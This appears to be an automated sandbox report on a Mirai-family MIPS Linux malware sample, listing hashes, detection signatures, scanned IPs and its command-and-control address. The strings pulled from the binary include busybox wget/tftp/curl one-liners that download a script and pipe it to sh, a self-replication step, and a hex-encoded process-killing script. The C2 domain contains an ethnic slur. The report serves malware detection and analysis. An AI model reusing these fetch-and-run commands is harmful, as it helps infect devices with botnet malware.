Linux Analysis Report
spQm3NLQtH.elf

Overview

General Information

Sample name: spQm3NLQtH.elf
renamed because original name is a hash value
Original sample name: 534d104fac3db123ae4a07e111f2d9e8.elf
Analysis ID: 1432502
MD5: 534d104fac3db123ae4a07e111f2d9e8
SHA1: 87d47d9eab53a3a7fbf882f78d6eb60ce3fed68e
SHA256: 0a9575abcb8f8dbd48d69838b310a4a061f7d59ab5043bd188e2f83d9cd17fb5
Tags: 32elfmipsmirai
Infos:

Detection

Score: 56
Range: 0 - 100
Whitelisted: false

Signatures

Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

AV Detection

barindex
Source: spQm3NLQtH.elf Virustotal: Detection: 33% Perma Link
Source: spQm3NLQtH.elf ReversingLabs: Detection: 47%
Source: spQm3NLQtH.elf String: incorrectinvalidbadwrongfaildeniederrorretryenableshellshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | shGET /dlr. HTTP/1.0

Networking

barindex
Source: global traffic TCP traffic: 5.181.80.60 ports 38241,1,2,3,4,8
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 35854
Source: global traffic TCP traffic: 192.168.2.13:58618 -> 5.181.80.60:38241
Source: /tmp/spQm3NLQtH.elf (PID: 5547) Socket: 127.0.0.1::39148 Jump to behavior
Source: unknown TCP traffic detected without corresponding DNS query: 178.231.136.253
Source: unknown TCP traffic detected without corresponding DNS query: 188.90.32.226
Source: unknown TCP traffic detected without corresponding DNS query: 122.171.218.231
Source: unknown TCP traffic detected without corresponding DNS query: 181.86.130.109
Source: unknown TCP traffic detected without corresponding DNS query: 156.146.4.37
Source: unknown TCP traffic detected without corresponding DNS query: 2.131.188.42
Source: unknown TCP traffic detected without corresponding DNS query: 72.190.151.66
Source: unknown TCP traffic detected without corresponding DNS query: 203.0.108.36
Source: unknown TCP traffic detected without corresponding DNS query: 193.65.22.38
Source: unknown TCP traffic detected without corresponding DNS query: 206.136.95.210
Source: unknown TCP traffic detected without corresponding DNS query: 142.113.199.213
Source: unknown TCP traffic detected without corresponding DNS query: 61.189.66.226
Source: unknown TCP traffic detected without corresponding DNS query: 145.245.248.37
Source: unknown TCP traffic detected without corresponding DNS query: 111.45.202.68
Source: unknown TCP traffic detected without corresponding DNS query: 106.198.38.189
Source: unknown TCP traffic detected without corresponding DNS query: 74.65.25.228
Source: unknown TCP traffic detected without corresponding DNS query: 25.222.109.123
Source: unknown TCP traffic detected without corresponding DNS query: 14.214.197.36
Source: unknown TCP traffic detected without corresponding DNS query: 119.194.116.208
Source: unknown TCP traffic detected without corresponding DNS query: 62.207.148.179
Source: unknown TCP traffic detected without corresponding DNS query: 57.127.99.131
Source: unknown TCP traffic detected without corresponding DNS query: 135.172.115.156
Source: unknown TCP traffic detected without corresponding DNS query: 97.248.208.25
Source: unknown TCP traffic detected without corresponding DNS query: 56.180.97.31
Source: unknown TCP traffic detected without corresponding DNS query: 162.32.152.65
Source: unknown TCP traffic detected without corresponding DNS query: 172.146.9.150
Source: unknown TCP traffic detected without corresponding DNS query: 17.7.169.246
Source: unknown TCP traffic detected without corresponding DNS query: 180.91.25.61
Source: unknown TCP traffic detected without corresponding DNS query: 203.177.40.211
Source: unknown TCP traffic detected without corresponding DNS query: 179.178.208.93
Source: unknown TCP traffic detected without corresponding DNS query: 67.237.123.222
Source: unknown TCP traffic detected without corresponding DNS query: 19.129.213.62
Source: unknown TCP traffic detected without corresponding DNS query: 134.94.190.245
Source: unknown TCP traffic detected without corresponding DNS query: 185.98.32.251
Source: unknown TCP traffic detected without corresponding DNS query: 19.158.221.57
Source: unknown TCP traffic detected without corresponding DNS query: 46.46.95.111
Source: unknown TCP traffic detected without corresponding DNS query: 56.46.183.16
Source: unknown TCP traffic detected without corresponding DNS query: 36.0.225.214
Source: unknown TCP traffic detected without corresponding DNS query: 42.8.8.26
Source: unknown TCP traffic detected without corresponding DNS query: 211.121.118.230
Source: unknown TCP traffic detected without corresponding DNS query: 165.203.50.163
Source: unknown TCP traffic detected without corresponding DNS query: 11.4.105.19
Source: unknown TCP traffic detected without corresponding DNS query: 14.191.222.246
Source: unknown TCP traffic detected without corresponding DNS query: 162.111.93.17
Source: unknown TCP traffic detected without corresponding DNS query: 175.203.11.236
Source: unknown TCP traffic detected without corresponding DNS query: 104.194.8.82
Source: unknown TCP traffic detected without corresponding DNS query: 2.16.166.212
Source: unknown TCP traffic detected without corresponding DNS query: 37.90.188.238
Source: unknown TCP traffic detected without corresponding DNS query: 80.229.104.32
Source: unknown TCP traffic detected without corresponding DNS query: 26.7.193.122
Source: global traffic DNS traffic detected: DNS query: infectedchink.pirate
Source: spQm3NLQtH.elf String found in binary or memory: http:///curl.sh
Source: spQm3NLQtH.elf String found in binary or memory: http:///wget.sh
Source: Initial sample String containing 'busybox' found: /bin/busybox
Source: Initial sample String containing 'busybox' found: usage: busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox hostname PBOC
Source: Initial sample String containing 'busybox' found: /bin/busybox echo >
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sample String containing 'busybox' found: /bin/busybox wget http://
Source: Initial sample String containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
Source: Initial sample String containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
Source: Initial sample String containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
Source: Initial sample String containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryenableshellshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | shGET /dlr. HTTP/1.0
Source: Initial sample String containing 'busybox' found: > .d/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrepThe People's/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4x
Source: ELF static info symbol of initial sample .symtab present: no
Source: classification engine Classification label: mal56.troj.linELF@0/80@1/0
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5580/maps Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5580/cmdline Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5570/maps Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5570/cmdline Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5570/maps Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5570/cmdline Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5581/maps Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5581/cmdline Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5571/maps Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5571/cmdline Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5571/maps Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5571/cmdline Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5582/maps Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5582/cmdline Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5572/maps Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5572/cmdline Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5583/maps Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5583/cmdline Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5573/maps Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5573/cmdline Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5584/maps Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5584/cmdline Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5574/maps Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5574/cmdline Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5575/maps Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5575/cmdline Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5576/maps Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5576/cmdline Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5598/maps Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5598/cmdline Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5577/maps Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5577/cmdline Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5567/maps Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5567/cmdline Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5567/maps Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5567/cmdline Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5578/maps Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5578/cmdline Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5568/maps Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5568/cmdline Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5568/maps Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5568/cmdline Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5579/maps Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5579/cmdline Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5569/maps Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5569/cmdline Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5569/maps Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5569/cmdline Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5635/maps Jump to behavior
Source: /tmp/spQm3NLQtH.elf (PID: 5553) File opened: /proc/5635/cmdline Jump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 35854
Source: /tmp/spQm3NLQtH.elf (PID: 5547) Queries kernel information via 'uname': Jump to behavior
Source: spQm3NLQtH.elf, 5547.1.0000557c7f38e000.0000557c7f415000.rw-.sdmp, spQm3NLQtH.elf, 5551.1.0000557c7f38e000.0000557c7f415000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/mipsel
Source: spQm3NLQtH.elf, 5547.1.0000557c7f38e000.0000557c7f415000.rw-.sdmp, spQm3NLQtH.elf, 5551.1.0000557c7f38e000.0000557c7f415000.rw-.sdmp Binary or memory string: |U!/etc/qemu-binfmt/mipsel
Source: spQm3NLQtH.elf, 5547.1.00007ffe826b0000.00007ffe826d1000.rw-.sdmp, spQm3NLQtH.elf, 5551.1.00007ffe826b0000.00007ffe826d1000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-mipsel/tmp/spQm3NLQtH.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/spQm3NLQtH.elf
Source: spQm3NLQtH.elf, 5547.1.00007ffe826b0000.00007ffe826d1000.rw-.sdmp, spQm3NLQtH.elf, 5551.1.00007ffe826b0000.00007ffe826d1000.rw-.sdmp Binary or memory string: /usr/bin/qemu-mipsel
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs